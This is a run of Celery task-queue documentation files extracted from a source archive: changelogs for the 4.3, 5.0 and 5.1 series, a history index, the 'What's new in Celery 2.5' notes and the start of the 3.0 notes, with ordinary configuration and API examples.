:class:`celery.worker.request.Request` now passes :class:`celery.app.task.Context` to the backend's store_result functions. Since the class currently passes `self` to these functions, revoking a task resulted in corrupted task result data when django-celery-results was used. Contributed by **Kiyohiro Yamaguchi** - **Worker**: Retry if the heartbeat connection dies. Previously, we keep trying to write to the broken connection. This results in a memory leak because the event dispatcher will keep appending the message to the outbound buffer. Contributed by **Raf Geens** - **Celery Beat**: Handle microseconds when scheduling. Contributed by **K Davis** - **Asynpool**: Fixed deadlock when closing socket. Upon attempting to close a socket, :class:`celery.concurrency.asynpool.AsynPool` only removed the queue writer from the hub but did not remove the reader. This led to a deadlock on the file descriptor and eventually the worker stopped accepting new tasks. We now close both the reader and the writer file descriptors in a single loop iteration which prevents the deadlock. Contributed by **Joshua Engelman** - **Celery Beat**: Correctly consider timezone when calculating timestamp. Contributed by **:github_user:`yywing`** - **Celery Beat**: :meth:`celery.beat.Scheduler.schedules_equal` can now handle either arguments being a `None` value. Contributed by **:github_user:` ratson`** - **Documentation/Sphinx**: Fixed Sphinx support for shared_task decorated functions. Contributed by **Jon Banafato** - **New Result Backend**: Added the CosmosDB result backend. This change adds a new results backend. The backend is implemented on top of the pydocumentdb library which uses Azure CosmosDB for a scalable, globally replicated, high-performance, low-latency and high-throughput PaaS backend. Contributed by **Clemens Wolff** - **Application**: Added configuration options to allow separate multiple apps to run on a single RabbitMQ vhost. The newly added :setting:`event_exchange` and :setting:`control_exchange` configuration options allow users to use separate Pidbox exchange and a separate events exchange. This allow different Celery applications to run separately on the same vhost. Contributed by **Artem Vasilyev** - **Result Backend**: Forget parent result metadata when forgetting a result. Contributed by **:github_user:`tothegump`** - **Task** Store task arguments inside :class:`celery.exceptions.MaxRetriesExceededError`. Contributed by **Anthony Ruhier** - **Result Backend**: Added the :setting:`result_accept_content` setting. This feature allows to configure different accepted content for the result backend. A special serializer (`auth`) is used for signed messaging, however the result_serializer remains in json, because we don't want encrypted content in our result backend. To accept unsigned content from the result backend, we introduced this new configuration option to specify the accepted content from the backend. Contributed by **Benjamin Pereto** - **Canvas**: Fixed error callback processing for class based tasks. Contributed by **Victor Mireyev** - **New Result Backend**: Added the S3 result backend. Contributed by **Florian Chardin** - **Task**: Added support for Cythonized Celery tasks. Contributed by **Andrey Skabelin** - **Riak Result Backend**: Warn Riak backend users for possible Python 3.7 incompatibilities. Contributed by **George Psarakis** - **Python Runtime**: Added Python 3.7 support. Contributed by **Omer Katz** & **Asif Saif Uddin** - **Auth Serializer**: Revamped the auth serializer. The auth serializer received a complete overhaul. It was previously horribly broken. We now depend on cryptography instead of pyOpenSSL for this serializer. Contributed by **Benjamin Pereto** - **Command Line**: :program:`celery report` now reports kernel version along with other platform details. Contributed by **Omer Katz** - **Canvas**: Fixed chords with chains which include sub chords in a group. Celery now correctly executes the last task in these types of canvases: .. code-block:: python c = chord( group([ chain( dummy.si(), chord( group([dummy.si(), dummy.si()]), dummy.si(), ), ), chain( dummy.si(), chord( group([dummy.si(), dummy.si()]), dummy.si(), ), ), ]), dummy.si() ) c.delay().get() Contributed by **Maximilien Cuony** - **Canvas**: Complex canvases with error callbacks no longer raises an :class:`AttributeError`. Very complex canvases such as `this `_ no longer raise an :class:`AttributeError` which prevents constructing them. We do not know why this bug occurs yet. Contributed by **Manuel Vázquez Acosta** - **Command Line**: Added proper error messages in cases where app cannot be loaded. Previously, celery crashed with an exception. We now print a proper error message. Contributed by **Omer Katz** - **Task**: Added the :setting:`task_default_priority` setting. You can now set the default priority of a task using the :setting:`task_default_priority` setting. The setting's value will be used if no priority is provided for a specific task. Contributed by **:github_user:`madprogrammer`** - **Dependencies**: Bump minimum required version of Kombu to 4.3 and Billiard to 3.6. Contributed by **Asif Saif Uddin** - **Result Backend**: Fix memory leak. We reintroduced weak references to bound methods for AsyncResult callback promises, after adding full weakref support for Python 2 in `vine `_. More details can be found in `celery/celery#4839 `_. Contributed by **George Psarakis** and **:github_user:`monsterxx03`**. - **Task Execution**: Fixed roundtrip serialization for eager tasks. When doing the roundtrip serialization for eager tasks, the task serializer will always be JSON unless the `serializer` argument is present in the call to :meth:`celery.app.task.Task.apply_async`. If the serializer argument is present but is `'pickle'`, an exception will be raised as pickle-serialized objects cannot be deserialized without specifying to `serialization.loads` what content types should be accepted. The Producer's `serializer` seems to be set to `None`, causing the default to JSON serialization. We now continue to use (in order) the `serializer` argument to :meth:`celery.app.task.Task.apply_async`, if present, or the `Producer`'s serializer if not `None`. If the `Producer`'s serializer is `None`, it will use the Celery app's `task_serializer` configuration entry as the serializer. Contributed by **Brett Jackson** - **Redis Result Backend**: The :class:`celery.backends.redis.ResultConsumer` class no longer assumes :meth:`celery.backends.redis.ResultConsumer.start` to be called before :meth:`celery.backends.redis.ResultConsumer.drain_events`. This fixes a race condition when using the Gevent workers pool. Contributed by **Noam Kush** - **Task**: Added the :setting:`task_inherit_parent_priority` setting. Setting the :setting:`task_inherit_parent_priority` configuration option to `True` will make Celery tasks inherit the priority of the previous task linked to it. Examples: .. code-block:: python c = celery.chain( add.s(2), # priority=None add.s(3).set(priority=5), # priority=5 add.s(4), # priority=5 add.s(5).set(priority=3), # priority=3 add.s(6), # priority=3 ) .. code-block:: python @app.task(bind=True) def child_task(self): pass @app.task(bind=True) def parent_task(self): child_task.delay() # child_task will also have priority=5 parent_task.apply_async(args=[], priority=5) Contributed by **:github_user:`madprogrammer`** - **Canvas**: Added the :setting:`result_chord_join_timeout` setting. Previously, :meth:`celery.result.GroupResult.join` had a fixed timeout of 3 seconds. The :setting:`result_chord_join_timeout` setting now allows you to change it. Contributed by **:github_user:`srafehi`** Code Cleanups, Test Coverage & CI Improvements by: - **Jon Dufresne** - **Asif Saif Uddin** - **Omer Katz** - **Brett Jackson** - **Bruno Alla** - **:github_user:`tothegump`** - **Bojan Jovanovic** - **Florian Chardin** - **:github_user:`walterqian`** - **Fabian Becker** - **Lars Rinn** - **:github_user:`madprogrammer`** - **Ciaran Courtney** Documentation Fixes by: - **Lewis M. Kabui** - **Dash Winterson** - **Shanavas M** - **Brett Randall** - **Przemysław Suliga** - **Joshua Schmid** - **Asif Saif Uddin** - **Xiaodong** - **Vikas Prasad** - **Jamie Alessio** - **Lars Kruse** - **Guilherme Caminha** - **Andrea Rabbaglietti** - **Itay Bittan** - **Noah Hall** - **Peng Weikang** - **Mariatta Wijaya** - **Ed Morley** - **Paweł Adamczak** - **:github_user:`CoffeeExpress`** - **:github_user:`aviadatsnyk`** - **Brian Schrader** - **Josue Balandrano Coronel** - **Tom Clancy** - **Sebastian Wojciechowski** - **Meysam Azad** - **Willem Thiart** - **Charles Chan** - **Omer Katz** - **Milind Shakya** ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-5.0.rst0000664000175000017500000001312600000000000020312 0ustar00asifasif00000000000000================ Change history ================ This document contains change notes for bugfix & new features in the 5.0.x , please see :ref:`whatsnew-5.0` for an overview of what's new in Celery 5.0. .. _version-5.0.6: 5.0.6 ===== :release-date: 2021-06-28 3.00 P.M UTC+3:00 :release-by: Omer Katz - Inspect commands accept arguments again (#6710). - The :setting:`worker_pool` setting is now respected correctly (#6711). - Ensure AMQPContext exposes an app attribute (#6741). - Exit celery with non zero exit value if failing (#6602). - --quiet flag now actually makes celery avoid producing logs (#6599). - pass_context for handle_preload_options decorator (#6583). - Fix --pool=threads support in command line options parsing (#6787). Fix the behavior of our json serialization which regressed in 5.0 (#6561). - celery -A app events -c camera now works as expected (#6774). .. _version-5.0.5: 5.0.5 ===== :release-date: 2020-12-16 5.35 P.M UTC+2:00 :release-by: Omer Katz - Ensure keys are strings when deleting results from S3 (#6537). - Fix a regression breaking `celery --help` and `celery events` (#6543). .. _version-5.0.4: 5.0.4 ===== :release-date: 2020-12-08 2.40 P.M UTC+2:00 :release-by: Omer Katz - DummyClient of cache+memory:// backend now shares state between threads (#6524). This fixes a problem when using our pytest integration with the in memory result backend. Because the state wasn't shared between threads, #6416 results in test suites hanging on `result.get()`. .. _version-5.0.3: 5.0.3 ===== :release-date: 2020-12-03 6.30 P.M UTC+2:00 :release-by: Omer Katz - Make `--workdir` eager for early handling (#6457). - When using the MongoDB backend, don't cleanup if result_expires is 0 or None (#6462). - Fix passing queues into purge command (#6469). - Restore `app.start()` and `app.worker_main()` (#6481). - Detaching no longer creates an extra log file (#6426). - Result backend instances are now thread local to ensure thread safety (#6416). - Don't upgrade click to 8.x since click-repl doesn't support it yet. - Restore preload options (#6516). .. _version-5.0.2: 5.0.2 ===== :release-date: 2020-11-02 8.00 P.M UTC+2:00 :release-by: Omer Katz - Fix _autodiscover_tasks_from_fixups (#6424). - Flush worker prints, notably the banner (#6432). - **Breaking Change**: Remove `ha_policy` from queue definition. (#6440) This argument has no effect since RabbitMQ 3.0. Therefore, We feel comfortable dropping it in a patch release. - Python 3.9 support (#6418). - **Regression**: When using the prefork pool, pick the fair scheduling strategy by default (#6447). - Preserve callbacks when replacing a task with a chain (#6189). - Fix max_retries override on `self.retry()` (#6436). - Raise proper error when replacing with an empty chain (#6452) .. _version-5.0.1: 5.0.1 ===== :release-date: 2020-10-18 1.00 P.M UTC+3:00 :release-by: Omer Katz - Specify UTF-8 as the encoding for log files (#6357). - Custom headers now propagate when using the protocol 1 hybrid messages (#6374). - Retry creating the database schema for the database results backend in case of a race condition (#6298). - When using the Redis results backend, awaiting for a chord no longer hangs when setting :setting:`result_expires` to 0 (#6373). - When a user tries to specify the app as an option for the subcommand, a custom error message is displayed (#6363). - Fix the `--without-gossip`, `--without-mingle`, and `--without-heartbeat` options which now work as expected. (#6365) - Provide a clearer error message when the application cannot be loaded. - Avoid printing deprecation warnings for settings when they are loaded from Django settings (#6385). - Allow lowercase log levels for the `--loglevel` option (#6388). - Detaching now works as expected (#6401). - Restore broadcasting messages from `celery control` (#6400). - Pass back real result for single task chains (#6411). - Ensure group tasks a deeply serialized (#6342). - Fix chord element counting (#6354). - Restore the `celery shell` command (#6421). .. _version-5.0.0: 5.0.0 ===== :release-date: 2020-09-24 6.00 P.M UTC+3:00 :release-by: Omer Katz - **Breaking Change** Remove AMQP result backend (#6360). - Warn when deprecated settings are used (#6353). - Expose retry_policy for Redis result backend (#6330). - Prepare Celery to support the yet to be released Python 3.9 (#6328). 5.0.0rc3 ======== :release-date: 2020-09-07 4.00 P.M UTC+3:00 :release-by: Omer Katz - More cleanups of leftover Python 2 support (#6338). 5.0.0rc2 ======== :release-date: 2020-09-01 6.30 P.M UTC+3:00 :release-by: Omer Katz - Bump minimum required eventlet version to 0.26.1. - Update Couchbase Result backend to use SDK V3. - Restore monkeypatching when gevent or eventlet are used. 5.0.0rc1 ======== :release-date: 2020-08-24 9.00 P.M UTC+3:00 :release-by: Omer Katz - Allow to opt out of ordered group results when using the Redis result backend (#6290). - **Breaking Change** Remove the deprecated celery.utils.encoding module. 5.0.0b1 ======= :release-date: 2020-08-19 8.30 P.M UTC+3:00 :release-by: Omer Katz - **Breaking Change** Drop support for the Riak result backend (#5686). - **Breaking Change** pytest plugin is no longer enabled by default (#6288). Install pytest-celery to enable it. - **Breaking Change** Brand new CLI based on Click (#5718). 5.0.0a2 ======= :release-date: 2020-08-05 7.15 P.M UTC+3:00 :release-by: Omer Katz - Bump Kombu version to 5.0 (#5686). 5.0.0a1 ======= :release-date: 2020-08-02 9.30 P.M UTC+3:00 :release-by: Omer Katz - Removed most of the compatibility code that supports Python 2 (#5686). - Modernized code to work on Python 3.6 and above (#5686). ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/history/changelog-5.1.rst0000664000175000017500000001272400000000000020316 0ustar00asifasif00000000000000.. _changelog: ================ Change history ================ This document contains change notes for bugfix & new features in the & 5.1.x series, please see :ref:`whatsnew-5.1` for an overview of what's new in Celery 5.1. .. version-5.1.2: 5.1.2 ===== :release-date: 2021-06-28 16.15 P.M UTC+3:00 :release-by: Omer Katz - When chords fail, correctly call errbacks. (#6814) We had a special case for calling errbacks when a chord failed which assumed they were old style. This change ensures that we call the proper errback dispatch method which understands new and old style errbacks, and adds test to confirm that things behave as one might expect now. - Avoid using the ``Event.isSet()`` deprecated alias. (#6824) - Reintroduce sys.argv default behaviour for ``Celery.start()``. (#6825) .. version-5.1.1: 5.1.1 ===== :release-date: 2021-06-17 16.10 P.M UTC+3:00 :release-by: Omer Katz - Fix ``--pool=threads`` support in command line options parsing. (#6787) - Fix ``LoggingProxy.write()`` return type. (#6791) - Couchdb key is now always coerced into a string. (#6781) - grp is no longer imported unconditionally. (#6804) This fixes a regression in 5.1.0 when running Celery in non-unix systems. - Ensure regen utility class gets marked as done when concertised. (#6789) - Preserve call/errbacks of replaced tasks. (#6770) - Use single-lookahead for regen consumption. (#6799) - Revoked tasks are no longer incorrectly marked as retried. (#6812, #6816) .. version-5.1.0: 5.1.0 ===== :release-date: 2021-05-23 19.20 P.M UTC+3:00 :release-by: Omer Katz - ``celery -A app events -c camera`` now works as expected. (#6774) - Bump minimum required Kombu version to 5.1.0. .. _version-5.1.0rc1: 5.1.0rc1 ======== :release-date: 2021-05-02 16.06 P.M UTC+3:00 :release-by: Omer Katz - Celery Mailbox accept and serializer parameters are initialized from configuration. (#6757) - Error propagation and errback calling for group-like signatures now works as expected. (#6746) - Fix sanitization of passwords in sentinel URIs. (#6765) - Add LOG_RECEIVED to customize logging. (#6758) .. _version-5.1.0b2: 5.1.0b2 ======= :release-date: 2021-05-02 16.06 P.M UTC+3:00 :release-by: Omer Katz - Fix the behavior of our json serialization which regressed in 5.0. (#6561) - Add support for SQLAlchemy 1.4. (#6709) - Safeguard against schedule entry without kwargs. (#6619) - ``task.apply_async(ignore_result=True)`` now avoids persisting the results. (#6713) - Update systemd tmpfiles path. (#6688) - Ensure AMQPContext exposes an app attribute. (#6741) - Inspect commands accept arguments again (#6710). - Chord counting of group children is now accurate. (#6733) - Add a setting :setting:`worker_cancel_long_running_tasks_on_connection_loss` to terminate tasks with late acknowledgement on connection loss. (#6654) - The ``task-revoked`` event and the ``task_revoked`` signal are not duplicated when ``Request.on_failure`` is called. (#6654) - Restore pickling support for ``Retry``. (#6748) - Add support in the redis result backend for authenticating with a username. (#6750) - The :setting:`worker_pool` setting is now respected correctly. (#6711) .. _version-5.1.0b1: 5.1.0b1 ======= :release-date: 2021-04-02 10.25 P.M UTC+6:00 :release-by: Asif Saif Uddin - Add sentinel_kwargs to Redis Sentinel docs. - Depend on the maintained python-consul2 library. (#6544). - Use result_chord_join_timeout instead of hardcoded default value. - Upgrade AzureBlockBlob storage backend to use Azure blob storage library v12 (#6580). - Improved integration tests. - pass_context for handle_preload_options decorator (#6583). - Makes regen less greedy (#6589). - Pytest worker shutdown timeout (#6588). - Exit celery with non zero exit value if failing (#6602). - Raise BackendStoreError when set value is too large for Redis. - Trace task optimizations are now set via Celery app instance. - Make trace_task_ret and fast_trace_task public. - reset_worker_optimizations and create_request_cls has now app as optional parameter. - Small refactor in exception handling of on_failure (#6633). - Fix for issue #5030 "Celery Result backend on Windows OS". - Add store_eager_result setting so eager tasks can store result on the result backend (#6614). - Allow heartbeats to be sent in tests (#6632). - Fixed default visibility timeout note in sqs documentation. - Support Redis Sentinel with SSL. - Simulate more exhaustive delivery info in apply(). - Start chord header tasks as soon as possible (#6576). - Forward shadow option for retried tasks (#6655). - --quiet flag now actually makes celery avoid producing logs (#6599). - Update platforms.py "superuser privileges" check (#6600). - Remove unused property `autoregister` from the Task class (#6624). - fnmatch.translate() already translates globs for us. (#6668). - Upgrade some syntax to Python 3.6+. - Add `azureblockblob_base_path` config (#6669). - Fix checking expiration of X.509 certificates (#6678). - Drop the lzma extra. - Fix JSON decoding errors when using MongoDB as backend (#6675). - Allow configuration of RedisBackend's health_check_interval (#6666). - Safeguard against schedule entry without kwargs (#6619). - Docs only - SQS broker - add STS support (#6693) through kombu. - Drop fun_accepts_kwargs backport. - Tasks can now have required kwargs at any order (#6699). - Min py-amqp 5.0.6. - min billiard is now 3.6.4.0. - Minimum kombu now is5.1.0b1. - Numerous docs fixes. - Moved CI to github action. - Updated deployment scripts. - Updated docker. - Initial support of python 3.9 added. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/history/index.rst0000664000175000017500000000124300000000000017167 0ustar00asifasif00000000000000.. _history: ========= History ========= This section contains historical change histories, for the latest version please visit :ref:`changelog`. :Release: |version| :Date: |today| .. toctree:: :maxdepth: 2 whatsnew-5.1 changelog-5.1 whatsnew-5.0 changelog-5.0 whatsnew-4.4 changelog-4.4 whatsnew-4.3 changelog-4.3 whatsnew-4.2 changelog-4.2 whatsnew-4.1 changelog-4.1 whatsnew-4.0 changelog-4.0 whatsnew-3.1 changelog-3.1 whatsnew-3.0 changelog-3.0 whatsnew-2.5 changelog-2.5 changelog-2.4 changelog-2.3 changelog-2.2 changelog-2.1 changelog-2.0 changelog-1.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/whatsnew-2.5.rst0000664000175000017500000003723200000000000020231 0ustar00asifasif00000000000000.. _whatsnew-2.5: ========================== What's new in Celery 2.5 ========================== Celery aims to be a flexible and reliable, best-of-breed solution to process vast amounts of messages in a distributed fashion, while providing operations with the tools to maintain such a system. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should visit our `website`_. While this version is backward compatible with previous versions it's important that you read the following section. If you use Celery in combination with Django you must also read the `django-celery changelog ` and upgrade to :pypi:`django-celery 2.5 `. This version is officially supported on CPython 2.5, 2.6, 2.7, 3.2 and 3.3, as well as PyPy and Jython. .. _`website`: http://celeryproject.org/ .. contents:: :local: .. _v250-important: Important Notes =============== Broker connection pool now enabled by default --------------------------------------------- The default limit is 10 connections, if you have many threads/green-threads using connections at the same time you may want to tweak this limit to avoid contention. See the :setting:`BROKER_POOL_LIMIT` setting for more information. Also note that publishing tasks will be retried by default, to change this default or the default retry policy see :setting:`CELERY_TASK_PUBLISH_RETRY` and :setting:`CELERY_TASK_PUBLISH_RETRY_POLICY`. Rabbit Result Backend: Exchange is no longer *auto delete* ---------------------------------------------------------- The exchange used for results in the Rabbit (AMQP) result backend used to have the *auto_delete* flag set, which could result in a race condition leading to an annoying warning. .. admonition:: For RabbitMQ users Old exchanges created with the *auto_delete* flag enabled has to be removed. The :program:`camqadm` command can be used to delete the previous exchange: .. code-block:: console $ camqadm exchange.delete celeryresults As an alternative to deleting the old exchange you can configure a new name for the exchange:: CELERY_RESULT_EXCHANGE = 'celeryresults2' But you have to make sure that all clients and workers use this new setting, so they're updated to use the same exchange name. Solution for hanging workers (but must be manually enabled) ----------------------------------------------------------- The `CELERYD_FORCE_EXECV` setting has been added to solve a problem with deadlocks that originate when threads and fork is mixed together: .. code-block:: python CELERYD_FORCE_EXECV = True This setting is recommended for all users using the prefork pool, but especially users also using time limits or a max tasks per child setting. - See `Python Issue 6721`_ to read more about this issue, and why resorting to :func:`~os.execv`` is the only safe solution. Enabling this option will result in a slight performance penalty when new child worker processes are started, and it will also increase memory usage (but many platforms are optimized, so the impact may be minimal). Considering that it ensures reliability when replacing lost worker processes, it should be worth it. - It's already the default behavior on Windows. - It will be the default behavior for all platforms in a future version. .. _`Python Issue 6721`: http://bugs.python.org/issue6721#msg140215 .. _v250-optimizations: Optimization ============ - The code path used when the worker executes a task has been heavily optimized, meaning the worker is able to process a great deal more tasks/second compared to previous versions. As an example the solo pool can now process up to 15000 tasks/second on a 4 core MacBook Pro when using the :pypi:`pylibrabbitmq` transport, where it previously could only do 5000 tasks/second. - The task error tracebacks are now much shorter. - Fixed a noticeable delay in task processing when rate limits are enabled. .. _v250-deprecations: Deprecation Time-line Changes ============================= Removals -------- * The old :class:`TaskSet` signature of ``(task_name, list_of_tasks)`` can no longer be used (originally scheduled for removal in 2.4). The deprecated ``.task_name`` and ``.task`` attributes has also been removed. * The functions ``celery.execute.delay_task``, ``celery.execute.apply``, and ``celery.execute.apply_async`` has been removed (originally) scheduled for removal in 2.3). * The built-in ``ping`` task has been removed (originally scheduled for removal in 2.3). Please use the ping broadcast command instead. * It's no longer possible to import ``subtask`` and ``TaskSet`` from :mod:`celery.task.base`, please import them from :mod:`celery.task` instead (originally scheduled for removal in 2.4). Deprecated modules ------------------ * The :mod:`celery.decorators` module has changed status from pending deprecation to deprecated, and is scheduled for removal in version 4.0. The ``celery.task`` module must be used instead. .. _v250-news: News ==== Timezone support ---------------- Celery can now be configured to treat all incoming and outgoing dates as UTC, and the local timezone can be configured. This isn't yet enabled by default, since enabling time zone support means workers running versions pre-2.5 will be out of sync with upgraded workers. To enable UTC you have to set :setting:`CELERY_ENABLE_UTC`:: CELERY_ENABLE_UTC = True When UTC is enabled, dates and times in task messages will be converted to UTC, and then converted back to the local timezone when received by a worker. You can change the local timezone using the :setting:`CELERY_TIMEZONE` setting. Installing the :pypi:`pytz` library is recommended when using a custom timezone, to keep timezone definition up-to-date, but it will fallback to a system definition of the timezone if available. UTC will enabled by default in version 3.0. .. note:: :pypi:`django-celery` will use the local timezone as specified by the ``TIME_ZONE`` setting, it will also honor the new `USE_TZ`_ setting introduced in Django 1.4. .. _`USE_TZ`: https://docs.djangoproject.com/en/dev/topics/i18n/timezones/ New security serializer using cryptographic signing --------------------------------------------------- A new serializer has been added that signs and verifies the signature of messages. The name of the new serializer is ``auth``, and needs additional configuration to work (see :ref:`conf-security`). .. seealso:: :ref:`guide-security` Contributed by Mher Movsisyan. New :setting:`CELERY_ANNOTATIONS` setting ----------------------------------------- This new setting enables the configuration to modify task classes and their attributes. The setting can be a dict, or a list of annotation objects that filter for tasks and return a map of attributes to change. As an example, this is an annotation to change the ``rate_limit`` attribute for the ``tasks.add`` task: .. code-block:: python CELERY_ANNOTATIONS = {'tasks.add': {'rate_limit': '10/s'}} or change the same for all tasks: .. code-block:: python CELERY_ANNOTATIONS = {'*': {'rate_limit': '10/s'}} You can change methods too, for example the ``on_failure`` handler: .. code-block:: python def my_on_failure(self, exc, task_id, args, kwargs, einfo): print('Oh no! Task failed: %r' % (exc,)) CELERY_ANNOTATIONS = {'*': {'on_failure': my_on_failure}} If you need more flexibility then you can also create objects that filter for tasks to annotate: .. code-block:: python class MyAnnotate(object): def annotate(self, task): if task.name.startswith('tasks.'): return {'rate_limit': '10/s'} CELERY_ANNOTATIONS = (MyAnnotate(), {other_annotations,}) ``current`` provides the currently executing task ------------------------------------------------- The new :data:`celery.task.current` proxy will always give the currently executing task. **Example**: .. code-block:: python from celery.task import current, task @task def update_twitter_status(auth, message): twitter = Twitter(auth) try: twitter.update_status(message) except twitter.FailWhale, exc: # retry in 10 seconds. current.retry(countdown=10, exc=exc) Previously you'd've to type ``update_twitter_status.retry(…)`` here, which can be annoying for long task names. .. note:: This won't work if the task function is called directly (i.e., ``update_twitter_status(a, b)``). For that to work ``apply`` must be used: ``update_twitter_status.apply((a, b))``. In Other News ------------- - Now depends on Kombu 2.1.0. - Efficient Chord support for the Memcached backend (Issue #533) This means Memcached joins Redis in the ability to do non-polling chords. Contributed by Dan McGee. - Adds Chord support for the Rabbit result backend (amqp) The Rabbit result backend can now use the fallback chord solution. - Sending :sig:`QUIT` to ``celeryd`` will now cause it cold terminate. That is, it won't finish executing the tasks it's currently working on. Contributed by Alec Clowes. - New "detailed" mode for the Cassandra backend. Allows to have a "detailed" mode for the Cassandra backend. Basically the idea is to keep all states using Cassandra wide columns. New states are then appended to the row as new columns, the last state being the last column. See the :setting:`CASSANDRA_DETAILED_MODE` setting. Contributed by Steeve Morin. - The Crontab parser now matches Vixie Cron behavior when parsing ranges with steps (e.g., 1-59/2). Contributed by Daniel Hepper. - ``celerybeat`` can now be configured on the command-line like ``celeryd``. Additional configuration must be added at the end of the argument list followed by ``--``, for example: .. code-block:: console $ celerybeat -l info -- celerybeat.max_loop_interval=10.0 - Now limits the number of frames in a traceback so that ``celeryd`` doesn't crash on maximum recursion limit exceeded exceptions (Issue #615). The limit is set to the current recursion limit divided by 8 (which is 125 by default). To get or set the current recursion limit use :func:`sys.getrecursionlimit` and :func:`sys.setrecursionlimit`. - More information is now preserved in the pickleable traceback. This has been added so that Sentry can show more details. Contributed by Sean O'Connor. - CentOS init-script has been updated and should be more flexible. Contributed by Andrew McFague. - MongoDB result backend now supports ``forget()``. Contributed by Andrew McFague - ``task.retry()`` now re-raises the original exception keeping the original stack trace. Suggested by :github_user:`ojii`. - The `--uid` argument to daemons now uses ``initgroups()`` to set groups to all the groups the user is a member of. Contributed by Łukasz Oleś. - ``celeryctl``: Added ``shell`` command. The shell will have the current_app (``celery``) and all tasks automatically added to locals. - ``celeryctl``: Added ``migrate`` command. The migrate command moves all tasks from one broker to another. Note that this is experimental and you should have a backup of the data before proceeding. **Examples**: .. code-block:: console $ celeryctl migrate redis://localhost amqp://localhost $ celeryctl migrate amqp://localhost//v1 amqp://localhost//v2 $ python manage.py celeryctl migrate django:// redis:// * Routers can now override the ``exchange`` and ``routing_key`` used to create missing queues (Issue #577). By default this will always use the name of the queue, but you can now have a router return exchange and routing_key keys to set them. This is useful when using routing classes which decides a destination at run-time. Contributed by Akira Matsuzaki. - Redis result backend: Adds support for a ``max_connections`` parameter. It's now possible to configure the maximum number of simultaneous connections in the Redis connection pool used for results. The default max connections setting can be configured using the :setting:`CELERY_REDIS_MAX_CONNECTIONS` setting, or it can be changed individually by ``RedisBackend(max_connections=int)``. Contributed by Steeve Morin. - Redis result backend: Adds the ability to wait for results without polling. Contributed by Steeve Morin. - MongoDB result backend: Now supports save and restore ``taskset``. Contributed by Julien Poissonnier. - There's a new :ref:`guide-security` guide in the documentation. - The init-scripts have been updated, and many bugs fixed. Contributed by Chris Streeter. - User (tilde) is now expanded in command-line arguments. - Can now configure :envvar:`CELERYCTL` environment variable in :file:`/etc/default/celeryd`. While not necessary for operation, :program:`celeryctl` is used for the ``celeryd status`` command, and the path to :program:`celeryctl` must be configured for that to work. The daemonization cookbook contains examples. Contributed by Jude Nagurney. - The MongoDB result backend can now use Replica Sets. Contributed by Ivan Metzlar. - gevent: Now supports autoscaling (Issue #599). Contributed by Mark Lavin. - multiprocessing: Mediator thread is now always enabled, even though rate limits are disabled, as the pool semaphore is known to block the main thread, causing broadcast commands and shutdown to depend on the semaphore being released. Fixes ===== - Exceptions that are re-raised with a new exception object now keeps the original stack trace. - Windows: Fixed the ``no handlers found for multiprocessing`` warning. - Windows: The ``celeryd`` program can now be used. Previously Windows users had to launch ``celeryd`` using ``python -m celery.bin.celeryd``. - Redis result backend: Now uses ``SETEX`` command to set result key, and expiry atomically. Suggested by :github_user:`yaniv-aknin`. - ``celeryd``: Fixed a problem where shutdown hanged when :kbd:`Control-c` was used to terminate. - ``celeryd``: No longer crashes when channel errors occur. Fix contributed by Roger Hu. - Fixed memory leak in the eventlet pool, caused by the use of ``greenlet.getcurrent``. Fix contributed by Ignas Mikalajūnas. - Cassandra backend: No longer uses :func:`pycassa.connect` which is deprecated since :pypi:`pycassa` 1.4. Fix contributed by Jeff Terrace. - Fixed unicode decode errors that could occur while sending error emails. Fix contributed by Seong Wun Mun. - ``celery.bin`` programs now always defines ``__package__`` as recommended by PEP-366. - ``send_task`` now emits a warning when used in combination with :setting:`CELERY_ALWAYS_EAGER` (Issue #581). Contributed by Mher Movsisyan. - ``apply_async`` now forwards the original keyword arguments to ``apply`` when :setting:`CELERY_ALWAYS_EAGER` is enabled. - ``celeryev`` now tries to re-establish the connection if the connection to the broker is lost (Issue #574). - ``celeryev``: Fixed a crash occurring if a task has no associated worker information. Fix contributed by Matt Williamson. - The current date and time is now consistently taken from the current loaders ``now`` method. - Now shows helpful error message when given a configuration module ending in ``.py`` that can't be imported. - ``celeryctl``: The :option:`--expires ` and :option:`--eta ` arguments to the apply command can now be an ISO-8601 formatted string. - ``celeryctl`` now exits with exit status ``EX_UNAVAILABLE`` (69) if no replies have been received. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/history/whatsnew-3.0.rst0000664000175000017500000007425400000000000020232 0ustar00asifasif00000000000000.. _whatsnew-3.0: =========================================== What's new in Celery 3.0 (Chiastic Slide) =========================================== Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. If you use Celery in combination with Django you must also read the `django-celery changelog`_ and upgrade to :pypi:`django-celery 3.0 `. This version is officially supported on CPython 2.5, 2.6, 2.7, 3.2 and 3.3, as well as PyPy and Jython. Highlights ========== .. topic:: Overview - A new and improved API, that's both simpler and more powerful. Everyone must read the new :ref:`first-steps` tutorial, and the new :ref:`next-steps` tutorial. Oh, and why not reread the user guide while you're at it :) There are no current plans to deprecate the old API, so you don't have to be in a hurry to port your applications. - The worker is now thread-less, giving great performance improvements. - The new "Canvas" makes it easy to define complex work-flows. Ever wanted to chain tasks together? This is possible, but not just that, now you can even chain together groups and chords, or even combine multiple chains. Read more in the :ref:`Canvas ` user guide. - All of Celery's command-line programs are now available from a single :program:`celery` umbrella command. - This is the last version to support Python 2.5. Starting with Celery 3.1, Python 2.6 or later is required. - Support for the new :pypi:`librabbitmq` C client. Celery will automatically use the :pypi:`librabbitmq` module if installed, which is a very fast and memory-optimized replacement for the :pypi:`amqp` module. - Redis support is more reliable with improved ack emulation. - Celery now always uses UTC - Over 600 commits, 30k additions/36k deletions. In comparison 1.0➝ 2.0 had 